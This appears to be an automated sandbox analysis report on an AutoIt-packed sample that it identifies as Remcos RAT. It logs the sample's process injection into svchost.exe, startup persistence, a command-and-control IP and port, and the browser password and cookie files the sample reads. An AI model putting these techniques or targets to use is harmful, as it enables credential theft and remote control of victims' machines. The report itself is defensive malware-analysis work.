                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CA5CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_00CA5CCC
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00DBC0B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00DBC0B0
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_03143540 mov eax, dword ptr fs:[00000030h]0_2_03143540
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_031434E0 mov eax, dword ptr fs:[00000030h]0_2_031434E0
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_03141E70 mov eax, dword ptr fs:[00000030h]0_2_03141E70
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03F73540 mov eax, dword ptr fs:[00000030h]2_2_03F73540
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03F734E0 mov eax, dword ptr fs:[00000030h]2_2_03F734E0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03F71E70 mov eax, dword ptr fs:[00000030h]2_2_03F71E70
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 4_2_00D33540 mov eax, dword ptr fs:[00000030h]4_2_00D33540
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 4_2_00D31E70 mov eax, dword ptr fs:[00000030h]4_2_00D31E70
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 4_2_00D334E0 mov eax, dword ptr fs:[00000030h]4_2_00D334E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00443355 mov eax, dword ptr fs:[00000030h]5_2_00443355
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_032634E0 mov eax, dword ptr fs:[00000030h]11_2_032634E0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_03261E70 mov eax, dword ptr fs:[00000030h]11_2_03261E70
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_03263540 mov eax, dword ptr fs:[00000030h]11_2_03263540
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00443355 mov eax, dword ptr fs:[00000030h]12_2_00443355
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00CC81F7
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C9A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C9A395
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C9A364 SetUnhandledExceptionFilter,0_2_00C9A364
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0004A364 SetUnhandledExceptionFilter,2_2_0004A364
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0004A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0004A395
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0043503C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00434A8A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0043BB71
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00434BD8 SetUnhandledExceptionFilter,5_2_00434BD8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0043503C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00434A8A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043BB71
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00434BD8 SetUnhandledExceptionFilter,12_2_00434BD8

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 45.95.169.104 2404
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3000008
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D88008
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 5_2_00412132
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 12_2_00412132
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00CC8C93 LogonUserW, 0_2_00CC8C93
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00C73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00C73B4C
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00C74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00C74A35
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00CD4EC9 mouse_event, 0_2_00CD4EC9
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jv4ri.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00CC81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00CC81F7
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00CD4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00CD4C03
                  Source: jv4ri.exe, 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp, name.exe, 00000002.00000002.2039583863.00000000000D5000.00000040.00000001.01000000.00000004.sdmp, name.exe, 00000004.00000002.2054778566.00000000000D5000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: svchost.exe, 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.dr | Binary or memory string: [2024/09/06 15:56:57 Program Manager]
                  Source: jv4ri.exe, name.exe | Binary or memory string: Shell_TrayWnd
                  Source: svchost.exe, 00000005.00000002.2348481451.0000000003436000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager+
                  Source: svchost.exe, 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00C9886B cpuid 0_2_00C9886B
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoA, 5_2_0040F90C
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW, 5_2_0045201B
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW, 5_2_004520B6
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 5_2_00452143
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW, 5_2_00452393
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW, 5_2_00448484
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 5_2_004524BC
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW, 5_2_004525C3
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 5_2_00452690
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW, 5_2_0044896D
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 5_2_00451D58
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW, 5_2_00451FD0
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW, 12_2_0045201B
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW, 12_2_004520B6
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 12_2_00452143
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW, 12_2_00452393
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW, 12_2_00448484
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 12_2_004524BC
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW, 12_2_004525C3
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 12_2_00452690
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoW, 12_2_0044896D
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: GetLocaleInfoA, 12_2_0040F90C
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 12_2_00451D58
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: EnumSystemLocalesW, 12_2_00451FD0
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00CA50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00CA50D7
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00CB2230 GetUserNameW, 0_2_00CB2230
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00CA418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00CA418A
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00C74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00C74AFE
                  Source: C:\Users\user\Desktop\jv4ri.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: Amcache.hve.8.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.8.dr | Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.8.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.8.dr | Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2181376722.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR
                  Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 5_2_0040BA4D
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 12_2_0040BA4D
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 5_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: \key3.db 5_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 12_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: \key3.db 12_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\svchost.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: name.exe | Binary or memory string: WIN_81
                  Source: name.exe | Binary or memory string: WIN_XP
                  Source: name.exe | Binary or memory string: WIN_XPe
                  Source: name.exe | Binary or memory string: WIN_VISTA
                  Source: name.exe | Binary or memory string: WIN_7
                  Source: name.exe | Binary or memory string: WIN_8
                  Source: name.exe, 0000000B.00000002.2181378905.00000000000D5000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                  Remote Access Functionality

                  Source: C:\Windows\SysWOW64\svchost.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-S3AD48
                  Source: C:\Windows\SysWOW64\svchost.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-S3AD48
                  Source: Yara match | File source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2181376722.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR
                  Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: cmd.exe 5_2_0040569A
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: cmd.exe 12_2_0040569A
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00CE6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00CE6596
                  Source: C:\Users\user\Desktop\jv4ri.exe | Code function: 0_2_00CE6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00CE6A5A
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_00096596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 2_2_00096596
                  Source: C:\Users\user\AppData\Local\directory\name.exe | Code function: 2_2_00096A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_00096A5A

                  MITRE ATT&CK Matrix
                  [Matrix rendered as a table on the original page; only the column headers and the techniques carrying a match count are recoverable here.]
                  Columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact
                  Techniques shown with a match count for this sample: Scripting; Valid Accounts; Native API; Exploitation for Privilege Escalation; Disable or Modify Tools; OS Credential Dumping; System Time Discovery; Archive Collected Data; Ingress Tool Transfer; System Shutdown/Reboot; Command and Scripting Interpreter; DLL Side-Loading; Deobfuscate/Decode Files or Information; Input Capture; Account Discovery; Data from Local System; Encrypted Channel; Defacement; Service Execution; Bypass User Account Control; Obfuscated Files or Information; Credentials In Files; System Service Discovery; Non-Standard Port; Windows Service; Software Packing; File and Directory Discovery; Clipboard Data; Remote Access Software; Registry Run Keys / Startup Folder; Access Token Manipulation; System Information Discovery; Application Layer Protocol; Security Software Discovery; Process Injection; Masquerading; Virtualization/Sandbox Evasion; Process Discovery; Application Window Discovery; System Owner/User Discovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1505824, Sample: jv4ri.exe, Startdate: 06/09/2024, Architecture: WINDOWS, Score: 100

                  • Sample (root node): Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures. Starts jv4ri.exe (node 9) and wscript.exe (node 13).
                  • jv4ri.exe (node 9): dropped C:\Users\user\AppData\Local\...\name.exe (PE32); Binary is likely a compiled AutoIt script file. Starts name.exe (node 15).
                  • wscript.exe (node 13): Windows Scripting host queries suspicious COM object (likely to drop second stage). Starts name.exe (node 19).
                  • name.exe (node 15): dropped C:\Users\user\AppData\Roaming\...\name.vbs (data); Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures. Starts name.exe (node 21) and svchost.exe (node 24).
                  • name.exe (node 19): Writes to foreign memory regions; Maps a DLL or memory area into another process. Starts svchost.exe (node 26).
                  • name.exe (node 21): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process. Starts svchost.exe (node 28).
                  • svchost.exe (node 24): Contains functionality to bypass UAC (CMSTPLUA); Contains functionalty to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 3 other signatures.
                  • svchost.exe (node 26): Detected Remcos RAT.
                  • svchost.exe (node 28): network contact 45.95.169.104, 2404, 49704, 49721 (GIGANET-HUGigaNetInternetServiceProviderCoHU, Croatia (LOCAL Name: Hrvatska)); dropped C:\ProgramData\remcos\logs.dat (data); System process connects to network (likely due to code injection or exploit); Detected Remcos RAT; Tries to harvest and steal browser information (history, passwords, etc); Installs a global keyboard hook. Starts WerFault.exe (node 33) and WerFault.exe (node 35).

                  Source | Detection | Scanner | Label
                  jv4ri.exe | 42% | ReversingLabs | Win32.Trojan.Vindor
                  jv4ri.exe | 100% | Joe Sandbox ML |
                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Local\directory\name.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\directory\name.exe | 42% | ReversingLabs | Win32.Trojan.Vindor
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label
                  http://upx.sf.net | 0% | URL Reputation | safe
                  5.95.169.104 | 0% | Avira URL Cloud | safe
                  http://geoplugin.net/json.gp | 0% | Avira URL Cloud | safe
                  http://geoplugin.net/json.gp/C | 0% | Avira URL Cloud | safe
                  No contacted domains info
                  Name | Malicious | Antivirus Detection | Reputation
                  5.95.169.104 | true | Avira URL Cloud: safe | unknown
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://geoplugin.net/json.gp | svchost.exe | false | Avira URL Cloud: safe | unknown
                  http://upx.sf.net | Amcache.hve.8.dr | false | URL Reputation: safe | unknown
                  http://geoplugin.net/json.gp/C | name.exe, 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, name.exe, 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  45.95.169.104 | unknown | Croatia (LOCAL Name: Hrvatska) | 42864 | GIGANET-HUGigaNetInternetServiceProviderCoHU | true
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1505824
                  Start date and time:2024-09-06 21:56:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 14s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of new started processes analysed:18
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:jv4ri.exe
                  Detection:MAL
                  Classification:mal100.rans.troj.spyw.expl.evad.winEXE@16/22@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 63
                  • Number of non-executed functions: 272
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.168.117.173
                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: jv4ri.exe
                  Time | Type | Description
                  15:57:21 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
                  21:56:58 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
                  No context
                  No context
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  GIGANET-HUGigaNetInternetServiceProviderCoHU | P.O_Qouts_t87E90Y-E4R7G-PDF.exe | malicious | Remcos, GuLoader | 45.95.169.18
                  GIGANET-HUGigaNetInternetServiceProviderCoHU | 7GfciIf7ys.exe | malicious | Unknown | 45.95.169.223
                  GIGANET-HUGigaNetInternetServiceProviderCoHU | Qoute_EXW_prices_43GJI_pdf.exe | malicious | Remcos, GuLoader | 45.95.169.110
